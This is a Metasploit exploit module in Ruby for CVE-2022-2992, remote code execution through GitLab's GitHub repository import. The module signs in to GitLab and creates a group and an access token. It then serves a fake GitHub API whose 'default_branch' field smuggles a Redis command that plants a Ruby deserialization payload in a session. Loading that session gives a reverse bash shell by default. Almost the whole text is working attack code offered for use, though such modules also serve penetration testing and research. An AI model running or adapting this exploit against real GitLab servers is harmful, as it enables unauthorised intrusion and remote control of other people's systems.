GitLab GitHub Repo Import Deserialization Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Git::SmartHttp  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Gitlab  include Msf::Exploit::RubyDeserialization  attr_accessor :cookie  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GitLab GitHub Repo Import Deserialization RCE',        'Description' => %q{          An authenticated user can import a repository from GitHub into GitLab.          If a user attempts to import a repo from an attacker-controlled server,          the server will reply with a Redis serialization protocol object in the nested          `default_branch`. GitLab will cache this object and          then deserialize it when trying to load a user session, resulting in RCE.        },        'Author' => [          'William Bowling (vakzz)', # discovery          'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module          'RedWay Security <https://infosec.exchange/@redway>', # PoC        ],        'References' => [          ['URL', 'https://hackerone.com/reports/1679624'],          ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC          ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],          ['CVE', '2022-2992']        ],        'DisclosureDate' => '2022-10-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),        OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),        OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])      ]    )    deregister_options('GIT_URI')  end  def group_name    @group_name ||= Rex::Text.rand_text_alpha(8..12)  end  def api_token    @api_token ||= gitlab_create_personal_access_token  end  def session_id    @session_id ||= Rex::Text.rand_text_hex(32)  end  def redis_payload(cmd)    serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)    gitlab_session_id = "session:gitlab:#{session_id}"    # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)    # The command set    # The gitlab session to load the payload from    # The Payload itself. A Ruby serialized command    "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"  end  def check    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie    vprint_status('Trying to get the GitLab version')    version = Rex::Version.new(gitlab_version)    return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (      version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||      version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||      version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))    )    report_vuln(      host: rhost,      name: name,      refs: references,      info: [version]    )    return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError    return CheckCode::Detected('Could not detect the version because authentication failed.')  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    return CheckCode::Unknown("#{e.class} - #{e.message}")  end  def cleanup    super    return unless @import_id    gitlab_delete_group(@group_id, api_token)    gitlab_revoke_personal_access_token(api_token)    gitlab_sign_out  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    print_error("#{e.class} - #{e.message}")  end  def exploit    if Rex::Socket.is_internal?(srvhost_addr)      print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")    end    setup_repo_structure    start_service({      'Uri' => {        'Proc' => proc do |cli, req|          on_request_uri(cli, req)        end,        'Path' => '/'      }    })    execute_command(payload.encoded)  rescue Timeout::Error => e    fail_with(Failure::TimeoutExpired, e.message)  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie    vprint_status("Session ID: #{session_id}")    vprint_status("Creating group #{group_name}")    # We need group id for the cleanup method    @group_id = gitlab_create_group(group_name, api_token)['id']    fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id    @redis_payload = redis_payload(cmd)    # import a repository from GitHub    vprint_status('Importing a repository from GitHub')    @import_id = gitlab_import_github_repo(      group_name: group_name,      github_hostname: get_uri,      api_token: api_token    )['id']    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id    # wait for the import tasks to finish    select(nil, nil, nil, datastore['IMPORT_DELAY'])    # execute the payload    send_request_cgi({      'uri' => normalize_uri(target_uri.path, group_name),      'method' => 'GET',      'keep_cookies' => false,      'cookie' => "_gitlab_session=#{session_id}"    })  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    fail_with(Failure::Unknown, "#{e.class} - #{e.message}")  end  def setup_repo_structure    blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"    blob_data = Rex::Text.rand_text_alpha(5..12)    blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)    tree_data =      {        mode: '100644',        file_name: blob_object_fname,        sha1: blob_object.sha1      }    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)    commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)    git_objs = [ commit_obj, tree_object, blob_object ]    @refs =      {        'HEAD' => 'refs/heads/main',        'refs/heads/main' => commit_obj.sha1      }    @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)  end  # Handle incoming requests from GitLab server  def on_request_uri(cli, req)    super    headers = { 'Content-Type' => 'application/json' }    data = {}.to_json    case req.uri    when %r{/api/v3/rate_limit}      headers.merge!({        'X-RateLimit-Limit' => '100000',        'X-RateLimit-Remaining' => '100000'      })    when %r{/api/v3/repositories/(\w{1,20})}      id = Regexp.last_match(1)      name = Rex::Text.rand_text_alpha(8..12)      data = {        id: id,        name: name,        full_name: "#{name}/name",        clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"      }.to_json    when %r{/\w+/public.git/info/refs}      data = build_pkt_line_advertise(@refs)      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })    when %r{/\w+/public.git/git-upload-pack}      data = build_pkt_line_sideband(@packfile)      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })    when %r{/api/v3/repos/\w+/\w+}      bytes_size = rand(3..8)      data = {        'default_branch' => {          'to_s' => {            'bytesize' => bytes_size,            'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"            # using a simple string format for RESP          }        }      }.to_json    end    send_response(cli, data, headers)  endend